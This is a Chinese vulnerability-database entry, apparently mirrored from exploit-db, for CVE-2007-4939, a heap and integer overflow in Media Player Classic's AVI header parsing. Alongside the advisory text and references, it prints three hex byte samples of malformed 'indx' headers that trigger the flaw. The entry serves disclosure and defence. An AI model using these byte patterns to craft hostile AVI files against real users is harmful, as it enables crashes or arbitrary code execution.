Media Player Classic Malformed AVI Header 多个远程漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1113615 漏洞类型 缓冲区溢出
发布时间 2007-09-12 更新时间 2007-10-03
CVE编号 CVE-2007-4939 CNNVD-ID CNNVD-200709-245
漏洞平台 Linux CVSS评分 9.3
|漏洞来源
https://www.exploit-db.com/exploits/30579
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200709-245
|漏洞详情
MediaPlayerClassic(MPC)中的mplayerc.exe存在堆缓冲区溢出,比如用于standalone和mympc(又称CD-Storm)1.0.0.1版本,StormPlayer1.0.4版本,以及可能的其他产品,远程攻击者可以借助一个具有0xffffffff的"indxtrucksize"以及特定wLongsPerEntry和nEntriesInuse值的.avi文件造成拒绝服务(应用程序崩溃)或可能执行任意代码。
|漏洞EXP
source: http://www.securityfocus.com/bid/25650/info

Media Player Classic (MPC) is prone to multiple remote vulnerabilities, including a heap-based buffer-overflow issue and an integer-overflow issue, when handling malformed AVI files.

An attacker can exploit these issues to execute arbitrary code with the privileges of the user running the affected application. Failed exploit attempts will result in a denial-of-service condition.

Media Player Classic 6.4.9.0 is vulnerable; other versions may also be affected.

The following examples of AVI header data are available:

69 6E 64 78 FF FF FF FF 01 00 64 73 20 00 00 10

indx truck size 0xffffffff
wLongsPerEntry 0x0001
BIndexSubType is 0x64
bIndexType is 0x73
nEntriesInuse is 0x10000020
69 6E 64 78 00 FF FF FF FF FF 64 73 FF FF FF FF

indx truck size 0xffffff00
wLongsPerEntry 0xffff
BIndexSubType is 0x64
bIndexType is 0x73
nEntriesInuse is 0xFFFFFFFF

69 6E 64 78 00 FF FF FF 01 11 64 73 20 00 00 10

indx truck size 0xffffff00
wLongsPerEntry 0x0001
BIndexSubType is 0x64
bIndexType is 0x73
nEntriesInuse is 0x10000020
|参考资料

来源:XF
名称:mediaplayerclassic-avi-bo(36583)
链接:http://xforce.iss.net/xforce/xfdb/36583
来源:MISC
链接:http://www.vulnhunt.com/advisories/CAL-20070912-1_Multiple_vendor_produce_handling_AVI_file_vulnerabilities.txt
来源:BID
名称:25650
链接:http://www.securityfocus.com/bid/25650
来源:BUGTRAQ
名称:20070912CAL-20070912-1MultiplevendorproducehandlingAVIfilevulnerabilities
链接:http://www.securityfocus.com/archive/1/archive/1/479222/100/0/threaded
来源:SECUNIA
名称:26808
链接:http://secunia.com/advisories/26808
来源:SECUNIA
名称:26807
链接:http://secunia.com/advisories/26807
来源:SECUNIA
名称:26806
链接:http://secunia.com/advisories/26806
来源:VUPEN
名称:ADV-2007-3142
链接:http://www.frsirt.com/english/advisories/2007/3142
来源:VUPEN
名称:ADV-2007-3141
链接:http://www.frsirt.com/english/advisories/2007/3141
来源:VUPEN
名称:ADV-2007-3140
链接:http://www.frsirt.com/english/advisories/2007/3140
来源:SREASON
名称:3144
链接:http://securityreason.com/securityalert/3144